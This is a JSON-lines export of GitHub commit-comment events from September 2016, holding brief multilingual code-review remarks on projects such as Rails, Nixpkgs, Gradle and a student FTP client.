{"id":"4499971859","type":"CommitCommentEvent","actor":{"login":"pedrosino"},"repo":{"name":"cubing/worldcubeassociation.org"},"payload":{"comment":{"id":18856712,"position":null,"line":null,"path":null,"commit_id":"675c69fb34832292173cf3b79b74e4bc1c909afe","created_at":"2016-09-01T01:39:22Z","updated_at":"2016-09-01T01:39:22Z","body":"Gah, sorry."}},"created_at":"2016-09-01T01:39:22Z"}
{"id":"4499973796","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18856714,"position":6,"line":252,"path":"en/source/switching_hub.rst","commit_id":"4b407c55503a0397a2cf89d18de0c3c5d8b3f423","created_at":"2016-09-01T01:40:05Z","updated_at":"2016-09-01T01:40:05Z","body":"ご指摘のように\r\n```\r\nofproto        使用しているOpenFlowバージョンに対応したofprotoモジュールを\r\n               示します。OpenFlow 1.3 の場合は下記になります。\r\n               ``ryu.ofproto.ofproto_v1_3``\r\n\r\nofproto_parser ofprotoと同様に、ofproto_parserモジュールを示します。\r\n               OpenFlow 1.3 の場合は下記になります。\r\n               ``ryu.ofproto.ofproto_v1_3_parser``\r\n```\r\nのように修正します。"}},"created_at":"2016-09-01T01:40:05Z"}
{"id":"4499974496","type":"CommitCommentEvent","actor":{"login":"jjethwa"},"repo":{"name":"jjethwa/rundeck"},"payload":{"comment":{"id":18856717,"position":null,"line":null,"path":null,"commit_id":"3358ff8e43429a634d619123a2c26aaaacb20e5e","created_at":"2016-09-01T01:40:19Z","updated_at":"2016-09-01T01:40:19Z","body":"Hi @mcarltzu \r\n\r\nIt's a Java specific option to limit the Metaspace usage by the JVM.  By default, it can grow as large as needed, so it's a good idea to set a limit.  It's used to store Java class metadata.  Hope that helps and welcome to the world of Docker 🙂"}},"created_at":"2016-09-01T01:40:19Z"}
{"id":"4499975906","type":"CommitCommentEvent","actor":{"login":"ingorichter"},"repo":{"name":"zaggino/brackets-electron"},"payload":{"comment":{"id":18856721,"position":null,"line":null,"path":null,"commit_id":"e560d000fc63d8d1010bce65b3118eb0e70a60eb","created_at":"2016-09-01T01:40:50Z","updated_at":"2016-09-01T01:40:50Z","body":"BTW: this is great. I had it on my list with open tasks. You did it and I can check it off. ;-)"}},"created_at":"2016-09-01T01:40:50Z"}
{"id":"4499976162","type":"CommitCommentEvent","actor":{"login":"mattsm"},"repo":{"name":"qca/boardfarm"},"payload":{"comment":{"id":18856722,"position":null,"line":null,"path":null,"commit_id":"f2423c4564a64c43945248f9a66eb841292957f2","created_at":"2016-09-01T01:40:57Z","updated_at":"2016-09-01T01:40:57Z","body":"Oh you just pushed without having the code reviewed. Not ideal but ok. "}},"created_at":"2016-09-01T01:40:57Z"}
{"id":"4499983720","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18856731,"position":9,"line":1125,"path":"app/ledger.js","commit_id":"980e6645bedb098b020cd813503f257d80b00f58","created_at":"2016-09-01T01:43:42Z","updated_at":"2016-09-01T01:43:42Z","body":"@mrose17 heads up on this change. i don't think tests can know where the the userData directory is, so test state files are in ~/.brave-test-ledger"}},"created_at":"2016-09-01T01:43:42Z"}
{"id":"4499985463","type":"CommitCommentEvent","actor":{"login":"sc4ryb3ar"},"repo":{"name":"ChikaraOSP/packages_apps_settings"},"payload":{"comment":{"id":18856733,"position":null,"line":null,"path":null,"commit_id":"f52917d8c0e31af6e361255de55acd9cbb8423ed","created_at":"2016-09-01T01:44:22Z","updated_at":"2016-09-01T01:44:22Z","body":"@xlxfoxxlx Josh, just sent you a Hangouts"}},"created_at":"2016-09-01T01:44:22Z"}
{"id":"4499986468","type":"CommitCommentEvent","actor":{"login":"AbuBaniaz"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18856735,"position":null,"line":null,"path":null,"commit_id":"263952de4dd97d3021123f8dd5b831c852e67c55","created_at":"2016-09-01T01:44:45Z","updated_at":"2016-09-01T01:44:45Z","body":"Using OpenPLI, the full remote is not displayed for the Mircalebox Premium Micro. It is looking for a Vu+ ultimo remote.\r\n\r\n"}},"created_at":"2016-09-01T01:44:45Z"}
{"id":"4499987372","type":"CommitCommentEvent","actor":{"login":"songjinzhong"},"repo":{"name":"1exciting/BD_FET"},"payload":{"comment":{"id":18856738,"position":54,"line":54,"path":"stage2/task16/song/task.js","commit_id":"27e609f23248866d05676969a245ae1554f178b2","created_at":"2016-09-01T01:45:05Z","updated_at":"2016-09-01T01:45:05Z","body":"dataset兼容性不是很好，好像不支持ie"}},"created_at":"2016-09-01T01:45:05Z"}
{"id":"4499990249","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-landingpage"},"payload":{"comment":{"id":18856743,"position":3,"line":3,"path":"Assignment/javascript-code/js/script.js","commit_id":"9e179c44587f1706a1de1cabf3ae549c9cbed1aa","created_at":"2016-09-01T01:46:12Z","updated_at":"2016-09-01T01:46:12Z","body":"Nice job leaving comments in your code!"}},"created_at":"2016-09-01T01:46:12Z"}
{"id":"4499996085","type":"CommitCommentEvent","actor":{"login":"mlspinylobster"},"repo":{"name":"onnfetuya/sanmoku"},"payload":{"comment":{"id":18856756,"position":55,"line":28,"path":"sanmoku.rb","commit_id":"eb43ea79a407f1eb481f4cf7d3de72ad7eed6608","created_at":"2016-09-01T01:48:24Z","updated_at":"2016-09-01T01:48:24Z","body":"`\"` をエスケープするよりは、 `'` で文字列を囲った方が見やすいと思います"}},"created_at":"2016-09-01T01:48:24Z"}
{"id":"4500001608","type":"CommitCommentEvent","actor":{"login":"loadGoodSVN"},"repo":{"name":"loadGoodSVN/Future"},"payload":{"comment":{"id":18856770,"position":1,"line":1,"path":"README.md","commit_id":"21a014aae470047c30fed9e7d7cd71fbda0cc9ef","created_at":"2016-09-01T01:50:29Z","updated_at":"2016-09-01T01:50:29Z","body":"easyui,layer.js"}},"created_at":"2016-09-01T01:50:29Z"}
{"id":"4500009754","type":"CommitCommentEvent","actor":{"login":"gera2ld"},"repo":{"name":"intellilab/translator.user.js"},"payload":{"comment":{"id":18856783,"position":null,"line":null,"path":null,"commit_id":"69617214e66ec4402638d2d376389ed012c98cee","created_at":"2016-09-01T01:53:31Z","updated_at":"2016-09-01T01:53:31Z","body":"会玩"}},"created_at":"2016-09-01T01:53:31Z"}
{"id":"4500021648","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"sectioneight/dotfiles"},"payload":{"comment":{"id":18856801,"position":1,"line":1,"path":"bin/git-count-by-author","commit_id":"72a5be8a937563ce318197918d9996cd3c1d9221","created_at":"2016-09-01T01:58:00Z","updated_at":"2016-09-01T01:58:00Z","body":"nit: readability :trollface: "}},"created_at":"2016-09-01T01:58:00Z"}
{"id":"4500022851","type":"CommitCommentEvent","actor":{"login":"JetLua"},"repo":{"name":"intellilab/translator.user.js"},"payload":{"comment":{"id":18856804,"position":null,"line":null,"path":null,"commit_id":"69617214e66ec4402638d2d376389ed012c98cee","created_at":"2016-09-01T01:58:27Z","updated_at":"2016-09-01T01:58:27Z","body":"@gera2ld 嗯，不然在https页面发送http请求控制台会输出警告，追求完美的人不能容忍一丝瑕疵。"}},"created_at":"2016-09-01T01:58:27Z"}
{"id":"4500023798","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"sectioneight/dotfiles"},"payload":{"comment":{"id":18856807,"position":null,"line":null,"path":null,"commit_id":"72a5be8a937563ce318197918d9996cd3c1d9221","created_at":"2016-09-01T01:58:47Z","updated_at":"2016-09-01T01:58:47Z","body":"I recently added git-who to my dotfiles, which is kinda similar: https://github.com/lencioni/dotfiles/blob/e24b1c3178b50e28d3effe39c6306cc6f4496847/bin/git-who"}},"created_at":"2016-09-01T01:58:47Z"}
{"id":"4500026832","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":18856811,"position":null,"line":null,"path":null,"commit_id":"0bfdcce56421af9069ffd79d80ef4311082a807e","created_at":"2016-09-01T01:59:53Z","updated_at":"2016-09-01T01:59:53Z","body":"#323 #325"}},"created_at":"2016-09-01T01:59:53Z"}
{"id":"4501612106","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18861149,"position":66,"line":80,"path":"lesson_9/modules.rb","commit_id":"bd47961a8a346b5358dbce1f03215d27c8c7a9c0","created_at":"2016-09-01T10:00:16Z","updated_at":"2016-09-01T10:00:16Z","body":"Зачем тут rescue? Мы наоборт и должны выбросит исключение, а обрабатывать его надо в методе valid? или пусть вызывающий код решает, что с этим делать."}},"created_at":"2016-09-01T10:00:16Z"}
{"id":"4501616682","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18861159,"position":76,"line":90,"path":"lesson_9/modules.rb","commit_id":"bd47961a8a346b5358dbce1f03215d27c8c7a9c0","created_at":"2016-09-01T10:01:08Z","updated_at":"2016-09-01T10:01:08Z","body":"Вообще-то, параметры должны при вызове validate задаваться, иначе, зачем тут args?"}},"created_at":"2016-09-01T10:01:08Z"}
{"id":"4501617868","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18861164,"position":80,"line":94,"path":"lesson_9/modules.rb","commit_id":"bd47961a8a346b5358dbce1f03215d27c8c7a9c0","created_at":"2016-09-01T10:01:22Z","updated_at":"2016-09-01T10:01:22Z","body":"И класс тоже должен задаваться в аргументах."}},"created_at":"2016-09-01T10:01:22Z"}
{"id":"4501619225","type":"CommitCommentEvent","actor":{"login":"fanlelong"},"repo":{"name":"fanlelong/ant"},"payload":{"comment":{"id":18861165,"position":null,"line":null,"path":null,"commit_id":"8e1bdf4d30715be50351bb76014f24fb3c9f32ca","created_at":"2016-09-01T10:01:39Z","updated_at":"2016-09-01T10:01:39Z","body":"#"}},"created_at":"2016-09-01T10:01:39Z"}
{"id":"4501628549","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18861186,"position":null,"line":null,"path":null,"commit_id":"8e76412f07449b04faa22c5120b3ebba649b9328","created_at":"2016-09-01T10:03:31Z","updated_at":"2016-09-01T10:03:31Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#eLMBpSm0TfmiJOk6u-QlNw"}},"created_at":"2016-09-01T10:03:31Z"}
{"id":"4501628912","type":"CommitCommentEvent","actor":{"login":"RicHook"},"repo":{"name":"RicHook/python"},"payload":{"comment":{"id":18861187,"position":42,"line":94,"path":"position.py","commit_id":"0c6179d9996d4c391445ec28467f96d52d6f1887","created_at":"2016-09-01T10:03:34Z","updated_at":"2016-09-01T10:03:34Z","body":"把以前在循环判断持仓变动的旗标去掉了"}},"created_at":"2016-09-01T10:03:34Z"}
{"id":"4501629288","type":"CommitCommentEvent","actor":{"login":"amitdo"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":18861189,"position":null,"line":null,"path":null,"commit_id":"b14f7353abe600948780c23dd83491fd4a132f22","created_at":"2016-09-01T10:03:39Z","updated_at":"2016-09-01T10:03:39Z","body":"@zdenop, users should also download osd traineddata."}},"created_at":"2016-09-01T10:03:39Z"}
{"id":"4501632024","type":"CommitCommentEvent","actor":{"login":"aothms"},"repo":{"name":"IfcOpenShell/IfcOpenShell"},"payload":{"comment":{"id":18861194,"position":null,"line":null,"path":null,"commit_id":"788395329059c7e6a96bb69afb14684136f856f2","created_at":"2016-09-01T10:04:14Z","updated_at":"2016-09-01T10:04:14Z","body":"A bit of a hack. But reason for this is I have some modules from [GnuWin32](http://gnuwin32.sourceforge.net/) and CMake keeps picking up an ancient pcre from this distribution.\r\n\r\nIt goes beyond me why CMake thinks `D:\\downloads\\gnuwin32\\GetGnuWin32\\gnuwin32\\lib\\pcre.lib` would qualify as a \"default path\" and why it would prioritize that over the explicitly provided `${OPENCOLLADA_LIBRARY_DIR}`."}},"created_at":"2016-09-01T10:04:14Z"}
{"id":"4501633340","type":"CommitCommentEvent","actor":{"login":"devalih"},"repo":{"name":"Edraak/edx-ora2"},"payload":{"comment":{"id":18861200,"position":null,"line":null,"path":null,"commit_id":"330bdfeb080fd88723e1efd4f1ecc9d99d54717f","created_at":"2016-09-01T10:04:29Z","updated_at":"2016-09-01T10:04:29Z","body":"https://github.com/Edraak/edx-ora2/commit/930808d6988913f878baa6146f44487dd9af954d\r\n\r\nYou can see all my commits here: https://github.com/Edraak/edx-ora2/commits/edraak/0.2.4\r\nThe last 4\r\nAnd it's all on Asana tasks https://app.asana.com/0/search/175335459227759/153583142420548"}},"created_at":"2016-09-01T10:04:29Z"}
{"id":"4501633760","type":"CommitCommentEvent","actor":{"login":"larskanis"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":18861201,"position":null,"line":null,"path":null,"commit_id":"7ba3a48df5bfdc5e98506bb829f937e03b55a5b3","created_at":"2016-09-01T10:04:33Z","updated_at":"2016-09-01T10:04:33Z","body":"@sgrif Thanks for finally fixing this! I think it's the best middle ground available."}},"created_at":"2016-09-01T10:04:33Z"}
{"id":"4501635032","type":"CommitCommentEvent","actor":{"login":"ValcanoCan"},"repo":{"name":"ValcanoCan/monment"},"payload":{"comment":{"id":18861203,"position":null,"line":null,"path":null,"commit_id":"6450213c811cb433a790b16074f32e3fd9b924b5","created_at":"2016-09-01T10:04:49Z","updated_at":"2016-09-01T10:04:49Z","body":"1"}},"created_at":"2016-09-01T10:04:49Z"}
{"id":"4501637089","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18861209,"position":null,"line":null,"path":null,"commit_id":"d0c5ced26ab21da042eeb947770d730c6c870c63","created_at":"2016-09-01T10:05:17Z","updated_at":"2016-09-01T10:05:17Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#fsVEtBrwRPaIGqJO1QQKcQ"}},"created_at":"2016-09-01T10:05:17Z"}
{"id":"4501643949","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18861222,"position":null,"line":null,"path":null,"commit_id":"d02e5a7d8fcbc4c9ab21b4a25680469d5c3a9804","created_at":"2016-09-01T10:06:41Z","updated_at":"2016-09-01T10:06:41Z","body":"That fixes the problem with `tests.misc`, thank you!"}},"created_at":"2016-09-01T10:06:41Z"}
{"id":"4501644341","type":"CommitCommentEvent","actor":{"login":"EugenMayer"},"repo":{"name":"mssola/Portus"},"payload":{"comment":{"id":18861224,"position":null,"line":null,"path":null,"commit_id":"ec0d0063b7811b2df64e75c12da36dcf4687bd8f","created_at":"2016-09-01T10:06:46Z","updated_at":"2016-09-01T10:06:46Z","body":"not yet merged, right? could you explain what `external_hostname: args[:external]` actually is? "}},"created_at":"2016-09-01T10:06:46Z"}
{"id":"4501646026","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861229,"position":1,"line":1,"path":".classpath","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:07:08Z","updated_at":"2016-09-01T10:07:08Z","body":"add .gitignore file to your repo in order to avoid adding editor specific files"}},"created_at":"2016-09-01T10:07:08Z"}
{"id":"4501646157","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861230,"position":2,"line":2,"path":".classpath","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:07:10Z","updated_at":"2016-09-01T10:07:10Z","body":"ditto"}},"created_at":"2016-09-01T10:07:10Z"}
{"id":"4501646840","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861232,"position":3,"line":3,"path":".classpath","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:07:18Z","updated_at":"2016-09-01T10:07:18Z","body":"Ditto"}},"created_at":"2016-09-01T10:07:18Z"}
{"id":"4501647274","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":18861233,"position":52,"line":1147,"path":"docs/ops.markdown","commit_id":"150760304e1d72c0435a334edccdcb5e773f006a","created_at":"2016-09-01T10:07:23Z","updated_at":"2016-09-01T10:07:23Z","body":"Fixed in bcf943a"}},"created_at":"2016-09-01T10:07:23Z"}
{"id":"4501647481","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861234,"position":1,"line":1,"path":".project","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:07:25Z","updated_at":"2016-09-01T10:07:25Z","body":"Ditto"}},"created_at":"2016-09-01T10:07:25Z"}
{"id":"4501648018","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861236,"position":2,"line":2,"path":".project","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:07:31Z","updated_at":"2016-09-01T10:07:31Z","body":"Ditto"}},"created_at":"2016-09-01T10:07:31Z"}
{"id":"4501649935","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861244,"position":5,"line":5,"path":"src/gorjan/helperTools/HelperTools.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:07:56Z","updated_at":"2016-09-01T10:07:56Z","body":"Missing java doc"}},"created_at":"2016-09-01T10:07:56Z"}
{"id":"4501650150","type":"CommitCommentEvent","actor":{"login":"EugenMayer"},"repo":{"name":"mssola/Portus"},"payload":{"comment":{"id":18861246,"position":29,"line":59,"path":"lib/tasks/portus.rake","commit_id":"ec0d0063b7811b2df64e75c12da36dcf4687bd8f","created_at":"2016-09-01T10:07:59Z","updated_at":"2016-09-01T10:07:59Z","body":"isnt that a race condition?  The registry needs portus to setup the bear-token auth during the start, but portus now needs the registry before it adds it - sounds like this blocks both"}},"created_at":"2016-09-01T10:07:59Z"}
{"id":"4501650847","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"vlucas/phpdotenv"},"payload":{"comment":{"id":18861248,"position":16,"line":375,"path":"src/Loader.php","commit_id":"58633a061610ffd731d7fbbc8f7f009d14b2e4cf","created_at":"2016-09-01T10:08:09Z","updated_at":"2016-09-01T10:08:09Z","body":"Tagged v2.4.0 for you."}},"created_at":"2016-09-01T10:08:09Z"}
{"id":"4501650905","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861250,"position":2,"line":2,"path":".project","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:08:10Z","updated_at":"2016-09-01T10:08:10Z","body":"ma dodao maloprije ja se malo zajebala\n\n\nOn Thu, Sep 1, 2016 at 12:07 PM, Davor Kovacic <notifications@github.com>\nwrote:\n\n> Ditto\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/GOA2000/FTPClient/commit/09b551a131d82d8d3f18b752f43f3cf5e2b6622d#commitcomment-18861236>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJNXFpdYWIVQm7YVXipbD0OyDh8shTORks5qlqPkgaJpZM4Jyhiy>\n> .\n>\n"}},"created_at":"2016-09-01T10:08:10Z"}
{"id":"4501651307","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18861252,"position":null,"line":null,"path":null,"commit_id":"0a08eee5711256319f9b72a4245f92b2f51af590","created_at":"2016-09-01T10:08:15Z","updated_at":"2016-09-01T10:08:15Z","body":"Type /help and you'll see the difference."}},"created_at":"2016-09-01T10:08:15Z"}
{"id":"4501653215","type":"CommitCommentEvent","actor":{"login":"uareurapid"},"repo":{"name":"katzer/cordova-plugin-local-notifications"},"payload":{"comment":{"id":18861259,"position":null,"line":null,"path":null,"commit_id":"da094647b5f79e8d561dd2b1093e489238644787","created_at":"2016-09-01T10:08:39Z","updated_at":"2016-09-01T10:08:39Z","body":"But if this was a revert, it means they do not work on IOS 10?"}},"created_at":"2016-09-01T10:08:39Z"}
{"id":"4501657041","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861268,"position":14,"line":14,"path":"src/gorjan/helperTools/HelperTools.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:09:28Z","updated_at":"2016-09-01T10:09:28Z","body":"Why is this synchronized? Also, no need for boxed types in arguments when one can use primitives - otherwise, check for null"}},"created_at":"2016-09-01T10:09:28Z"}
{"id":"4501657203","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861269,"position":15,"line":15,"path":"src/gorjan/helperTools/HelperTools.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:09:29Z","updated_at":"2016-09-01T10:09:29Z","body":"Why lose precision, just use long"}},"created_at":"2016-09-01T10:09:29Z"}
{"id":"4501659758","type":"CommitCommentEvent","actor":{"login":"harimayco"},"repo":{"name":"crocodic-studio/crudbooster"},"payload":{"comment":{"id":18861276,"position":null,"line":null,"path":null,"commit_id":"fc42ab5fe9c37627be8f070b68b7dd3c1802cbd7","created_at":"2016-09-01T10:10:01Z","updated_at":"2016-09-01T10:10:01Z","body":"muanthab mas ini yg saya tunggu2... :+1: "}},"created_at":"2016-09-01T10:10:01Z"}
{"id":"4501660052","type":"CommitCommentEvent","actor":{"login":"RicHook"},"repo":{"name":"RicHook/python"},"payload":{"comment":{"id":18861278,"position":49,"line":100,"path":"position.py","commit_id":"0c6179d9996d4c391445ec28467f96d52d6f1887","created_at":"2016-09-01T10:10:05Z","updated_at":"2016-09-01T10:10:05Z","body":"这个新的判断函数是根据最终的change文件来的，如果文件内部有“+”，“-”的就说明有变动，然后提取出来并记录变动条数，如果为奇数就说明持仓必定增加或减少。是偶数的话就还有误报的可能，进入下面的判断，看提取出来的code的变动是否为同一个code，如果不为同一个说明持仓有变动，为同一个还是有误报的可能，在进行下一次判断，看两次持仓的差值的绝对值是否大于5,。要是大于就不是误报。\r\n"}},"created_at":"2016-09-01T10:10:05Z"}
{"id":"4501661420","type":"CommitCommentEvent","actor":{"login":"nightwolfdu"},"repo":{"name":"nightwolfdu/victory-chart"},"payload":{"comment":{"id":18861282,"position":5,"line":5,"path":"test/client/spec/helpers/axissync.spec.js","commit_id":"d43bb14fd8e2be06ef6fd8f3e5d47172c4f50588","created_at":"2016-09-01T10:10:23Z","updated_at":"2016-09-01T10:10:23Z","body":"Rewrite test to public method."}},"created_at":"2016-09-01T10:10:23Z"}
{"id":"4501663080","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861288,"position":13,"line":13,"path":"src/gorjan/test/FTPClientMain.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:10:44Z","updated_at":"2016-09-01T10:10:44Z","body":"Why is this static? Sounds like you might want to make this class produce singleton object in order to ensure singularity of an instance. Using static members should be avoided."}},"created_at":"2016-09-01T10:10:44Z"}
{"id":"4501663134","type":"CommitCommentEvent","actor":{"login":"nightwolfdu"},"repo":{"name":"nightwolfdu/victory-chart"},"payload":{"comment":{"id":18861289,"position":64,"line":64,"path":"src/helpers/axissync.js","commit_id":"d43bb14fd8e2be06ef6fd8f3e5d47172c4f50588","created_at":"2016-09-01T10:10:44Z","updated_at":"2016-09-01T10:10:44Z","body":"Make sync public and all private"}},"created_at":"2016-09-01T10:10:44Z"}
{"id":"4501670144","type":"CommitCommentEvent","actor":{"login":"huxi"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18861300,"position":17,"line":32,"path":"subprojects/logging/src/integTest/groovy/org/gradle/DeprecationHandlingIntegrationTest.groovy","commit_id":"486fc4d5eebc45e95582910f3f66e22664752218","created_at":"2016-09-01T10:12:15Z","updated_at":"2016-09-01T10:12:15Z","body":"@wolfs Most line number checks are now off by one line.\r\n\r\ne.g. `output.contains('build.gradle:4)')` must be changed to `output.contains('build.gradle:5)')` and so on.\r\n\r\nThe `// line <nr>` should also be fixed."}},"created_at":"2016-09-01T10:12:15Z"}
{"id":"4501670998","type":"CommitCommentEvent","actor":{"login":"magnesj"},"repo":{"name":"OPM/ResInsight"},"payload":{"comment":{"id":18861302,"position":null,"line":null,"path":null,"commit_id":"0128baddff58ce3fc4eab843c4b00a21bfed0ce3","created_at":"2016-09-01T10:12:28Z","updated_at":"2016-09-01T10:12:28Z","body":"Thanks for the feedback, will look into this issue as soon as possbile."}},"created_at":"2016-09-01T10:12:28Z"}
{"id":"4501675352","type":"CommitCommentEvent","actor":{"login":"chris-baynes"},"repo":{"name":"Contiamo/morgenbot"},"payload":{"comment":{"id":18861313,"position":null,"line":null,"path":null,"commit_id":"8e8d9e79946909f1cab920e984976807f132178d","created_at":"2016-09-01T10:13:22Z","updated_at":"2016-09-01T10:13:22Z","body":"Nice!"}},"created_at":"2016-09-01T10:13:22Z"}
{"id":"4501676095","type":"CommitCommentEvent","actor":{"login":"harttle"},"repo":{"name":"harttle/pm2-notify"},"payload":{"comment":{"id":18861316,"position":23,"line":114,"path":"index.js","commit_id":"c8811021a8878656f62401363a97a45ae10c9f46","created_at":"2016-09-01T10:13:32Z","updated_at":"2016-09-01T10:13:32Z","body":"But using setTimeout, if errors are continuously thrown, sendMail will never be called.\r\nI'll look for a callback from nodemail."}},"created_at":"2016-09-01T10:13:32Z"}
{"id":"4501678023","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861321,"position":17,"line":17,"path":"src/gorjan/test/FTPClientMain.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:13:56Z","updated_at":"2016-09-01T10:13:56Z","body":"Having a static method is fine, but it should not have side-effects like this (changing the state of the shared data). A better alternative would be to have an argument parsing method which returns either the structure holding all arguments or set up connection object, which should not be a static class"}},"created_at":"2016-09-01T10:13:56Z"}
{"id":"4501679320","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861324,"position":20,"line":20,"path":"src/gorjan/test/FTPClientMain.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:14:14Z","updated_at":"2016-09-01T10:14:14Z","body":"Same thing as with the connection"}},"created_at":"2016-09-01T10:14:14Z"}
{"id":"4501680150","type":"CommitCommentEvent","actor":{"login":"EugenMayer"},"repo":{"name":"mssola/Portus"},"payload":{"comment":{"id":18861326,"position":29,"line":59,"path":"lib/tasks/portus.rake","commit_id":"ec0d0063b7811b2df64e75c12da36dcf4687bd8f","created_at":"2016-09-01T10:14:26Z","updated_at":"2016-09-01T10:14:26Z","body":"I just re-tested my assumption, that the regstry fails starting up if the auth service is not available - but thats not true. So that just fine, ignore my comment. \r\n\r\nEventhough that means that the catalogs have to wait for the registry to be up before starting up portus ( initially )"}},"created_at":"2016-09-01T10:14:26Z"}
{"id":"4501680262","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861327,"position":22,"line":22,"path":"src/gorjan/test/FTPClientMain.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:14:27Z","updated_at":"2016-09-01T10:14:27Z","body":"Using logging might be better way of doing this"}},"created_at":"2016-09-01T10:14:27Z"}
{"id":"4501681951","type":"CommitCommentEvent","actor":{"login":"billings7"},"repo":{"name":"webappsuk/CoreLibraries"},"payload":{"comment":{"id":18861329,"position":10,"line":null,"path":"Initializer/InjectModuleInitializer.targets","commit_id":"924149efca09f413231f62fc61c0b9175fd8787c","created_at":"2016-09-01T10:14:51Z","updated_at":"2016-09-01T10:14:51Z","body":"This collection should be empty by default, the build task itself adds a default path, so no defaulting logic is required in the targets file."}},"created_at":"2016-09-01T10:14:51Z"}
{"id":"4501684302","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861338,"position":31,"line":31,"path":"src/gorjan/test/FTPClientMain.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:15:22Z","updated_at":"2016-09-01T10:15:22Z","body":"Instead of using Threading primitives, consider using some of the higher level Java multiprocessing abstractions like Executors"}},"created_at":"2016-09-01T10:15:22Z"}
{"id":"4501684913","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18861342,"position":null,"line":null,"path":null,"commit_id":"4499a505ed9c71c2fccbd746052bdffdaac1a1e0","created_at":"2016-09-01T10:15:30Z","updated_at":"2016-09-01T10:15:30Z","body":"Oh, I supposed that we do already have `16.09` in `nixpkgsVersion`, so I (incorrectly) reduced this to `listOf str`. Thanks again!"}},"created_at":"2016-09-01T10:15:30Z"}
